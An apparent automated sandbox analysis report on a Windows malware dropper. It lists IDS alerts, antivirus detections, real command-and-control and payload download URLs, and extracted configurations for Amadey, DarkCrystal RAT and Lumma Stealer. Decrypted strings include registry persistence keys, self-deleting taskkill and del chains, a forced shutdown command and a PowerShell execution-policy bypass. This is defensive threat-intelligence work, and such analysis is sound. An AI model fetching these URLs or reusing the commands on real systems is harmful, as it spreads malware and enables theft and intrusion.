Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.461112+0100	2060420	1	Domain Observed Used for C2 Detected	192.168.2.6	50814	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strawpeasaen .fun)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.292882+0100	2060422	1	Domain Observed Used for C2 Detected	192.168.2.6	53980	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tracnquilforest .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.255341+0100	2060424	1	Domain Observed Used for C2 Detected	192.168.2.6	58822	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:57:57.791127+0100	2048130	1	A Network Trojan was detected	192.168.2.6	49728	37.230.113.179	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:57:06.258886+0100	2856147	1	A Network Trojan was detected	192.168.2.6	49696	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:57:11.038704+0100	2803305	3	Unknown Traffic	192.168.2.6	49698	176.113.115.7	80	TCP
2025-03-10T19:57:17.930113+0100	2803305	3	Unknown Traffic	192.168.2.6	49703	176.113.115.7	80	TCP
2025-03-10T19:57:24.212462+0100	2803305	3	Unknown Traffic	192.168.2.6	49708	176.113.115.7	80	TCP
2025-03-10T19:57:30.139673+0100	2803305	3	Unknown Traffic	192.168.2.6	49711	176.113.115.7	80	TCP
2025-03-10T19:57:36.178200+0100	2803305	3	Unknown Traffic	192.168.2.6	49716	176.113.115.7	80	TCP
2025-03-10T19:57:42.966313+0100	2803305	3	Unknown Traffic	192.168.2.6	49718	176.113.115.7	80	TCP
2025-03-10T19:57:54.797765+0100	2803305	3	Unknown Traffic	192.168.2.6	49723	176.113.115.7	80	TCP
2025-03-10T19:58:01.403867+0100	2803305	3	Unknown Traffic	192.168.2.6	49735	176.113.115.7	80	TCP
2025-03-10T19:58:09.204613+0100	2803305	3	Unknown Traffic	192.168.2.6	49747	176.113.115.7	80	TCP
2025-03-10T19:58:17.879756+0100	2803305	3	Unknown Traffic	192.168.2.6	49760	176.113.115.7	80	TCP
2025-03-10T19:58:26.879485+0100	2803305	3	Unknown Traffic	192.168.2.6	49774	176.113.115.7	80	TCP
2025-03-10T19:58:33.804491+0100	2803305	3	Unknown Traffic	192.168.2.6	49787	176.113.115.7	80	TCP
2025-03-10T19:58:43.612343+0100	2803305	3	Unknown Traffic	192.168.2.6	49804	176.113.115.7	80	TCP
2025-03-10T19:58:49.717574+0100	2803305	3	Unknown Traffic	192.168.2.6	49815	176.113.115.7	80	TCP
2025-03-10T19:58:56.236151+0100	2803305	3	Unknown Traffic	192.168.2.6	49827	176.113.115.7	80	TCP
2025-03-10T19:59:12.783101+0100	2803305	3	Unknown Traffic	192.168.2.6	49858	176.113.115.7	80	TCP
2025-03-10T19:59:19.825894+0100	2803305	3	Unknown Traffic	192.168.2.6	49874	176.113.115.7	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: download.php.exe.bin.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://cjlaspcorne.icu/DbIps	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/teamex_support/random.exe	Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/z_h	Avira URL Cloud: Label: malware
Source: https://htardwarehu.icu/Sbdsa	Avira URL Cloud: Label: malware
Source: https://arisechairedd.shop/JnsHY	Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/%	Avira URL Cloud: Label: malware
Source: https://bugildbett.top/bAuz	Avira URL Cloud: Label: malware
Source: https://htardwarehu.icu:443/Sbdsa	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/martin2/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7212159662/HmngBpR.exe	Avira URL Cloud: Label: malware
Source: https://defaulemot.run:443/jUSiaz	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7834629666/v6Oqdnc.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/test/exe/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/fate/random.exe	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top:443/aNzS	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7098980627/mAtJWNv.exe	Avira URL Cloud: Label: malware
Source: https://fostinjec.today/LksNAzsh	Avira URL Cloud: Label: malware
Source: https://catterjur.run/boSnzhu	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/test/am_no.bat	Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/z~	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzS	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/qqdoup/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/unique2/random.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6098950268/cuFIzyH.exe?	Avira URL Cloud: Label: malware
Source: https://legenassedk.top:443/bdpWO	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7868598855/zY9sqWs.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6098950268/cuFIzyH.exe	Avira URL Cloud: Label: malware
Source: https://sterpickced.digital/Vh	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Avira: detection malicious, Label: TR/Redcap.fqkqd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\v6Oqdnc[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cuFIzyH[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe	Avira: detection malicious, Label: TR/AVI.Amadey.itpsl
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EJmAkGq[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: TR/AD.Nekark.qnifa
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\P2SXMuh[1].exe	Avira: detection malicious, Label: TR/Redcap.fqkqd
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\HmngBpR[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.yoirp
Source: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	Avira: detection malicious, Label: TR/AD.PSLoader.wdbmn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	Avira: detection malicious, Label: TR/AD.Nekark.ccjuh
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Recovery\Gr2GcblCRURZoQ7.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 35.2.8p5Lrev.exe.431080.1.unpack	Malware Configuration Extractor: DCRat {"C2 url": "http://37.230.113.179/7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe	ReversingLabs: Detection: 71%
Source: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe	ReversingLabs: Detection: 71%
Source: C:\Recovery\Gr2GcblCRURZoQ7.exe	ReversingLabs: Detection: 71%
Source: C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7T7bCyA[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\HmngBpR[1].exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\P2SXMuh[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\6z1l5Yn[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\EJmAkGq[1].exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\8p5Lrev[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cuFIzyH[1].exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\v6Oqdnc[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ADFoyxP[1].exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\ClhN6R8[1].exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\10169000101\EJmAkGq.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10169690101\c353af48cf.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\10169700101\f86c60eea6.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10169710101\f3f3c71039.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10169730101\d151155bf3.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10169760101\ClhN6R8.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\10169770101\cuFIzyH.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10169790101\ADFoyxP.exe	ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Local\Temp\10169800101\HmngBpR.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\Temp\10169810101\v6Oqdnc.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10169830101\P2SXMuh.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10169850101\6z1l5Yn.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\10169860101\8p5Lrev.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10169870101\7T7bCyA.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\10169880101\EJmAkGq.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3B05c.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: download.php.exe.bin.exe	Virustotal: Detection: 65%			Perma Link
Source: download.php.exe.bin.exe	ReversingLabs: Detection: 60%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 176.113.115.6
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: /Ni9kiput/index.php
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: S-%lu-
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: bb556cff4a
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: rapes.exe
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Startup
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: rundll32
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Programs
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: %USERPROFILE%
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: cred.dll
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: clip.dll
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: http://
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: https://
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: /quiet
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: /Plugins/
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: &unit=
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: shell32.dll
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: kernel32.dll
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: GetNativeSystemInfo
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: ProgramData\
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: AVAST Software
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Kaspersky Lab
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Panda Security
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Doctor Web
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 360TotalSecurity
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Bitdefender
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Norton
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Sophos
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Comodo
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: WinDefender
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 0123456789
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: ------
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: ?scr=1
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: ComputerName
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: -unicode-
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: VideoID
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: DefaultSettings.XResolution
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: DefaultSettings.YResolution
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: ProductName
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: CurrentBuild
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: rundll32.exe
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: "taskkill /f /im "
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: " && timeout 1 && del
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: && Exit"
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: " && ren
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Powershell.exe
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: shutdown -s -t 0
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: random
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: Keyboard Layout\Preload
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 00000419
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 00000422
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 00000423
Source: 0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	String decryptor: 0000043f
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: defaulemot.run/jUSiaz
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz
Source: 00000026.00000000.2013094755.0000000000DD2000.00000002.00000001.01000000.00000015.sdmp	String decryptor: ["ok4leoudkVu7esQ1lZsW40DxUvtiml676ijTfQLRlp5otrM3h2PS8aaxgHRt4L19YwA5J7VUNbvP5YEmizAuWn9gIvxY9cWZx6Q6qQukg4FgpK2HCoLEKHmuwexXJ7Uv","34c427afce3fdad27990a5bd47be2191abc439c5d1a7304813dd2c2a0346ebb3","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000026.00000000.2013094755.0000000000DD2000.00000002.00000001.01000000.00000015.sdmp	String decryptor: [["http://37.230.113.179/7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/","SqlTrack"]]

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe

Code function: 1_2_00E22F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

1_2_00E22F1D

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe

Unpacked PE file: 43.2.7T7bCyA.exe.3190000.1.unpack

Source: download.php.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Common Files\Adobe\d1323f9dc58b56
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe
Source: C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	Directory created: C:\Program Files\Windows Sidebar\b1f3a7b70830da

Source: download.php.exe.bin.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wextract.pdb source: download.php.exe.bin.exe, download.php.exe.bin.exe, 00000000.00000000.1258668306.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, G2C28.exe, G2C28.exe, 00000001.00000000.1262009453.0000000000E21000.00000020.00000001.01000000.00000004.sdmp
Source:	Binary string: wextract.pdbGCTL source: download.php.exe.bin.exe, 00000000.00000000.1258668306.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, G2C28.exe, 00000001.00000000.1262009453.0000000000E21000.00000020.00000001.01000000.00000004.sdmp

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe	Code function: 1_2_00E22390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00E22390
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A9AA8E FindFirstFileExW,	17_2_00A9AA8E
Source: C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe	Code function: 17_2_00A9AB3F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	17_2_00A9AB3F

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
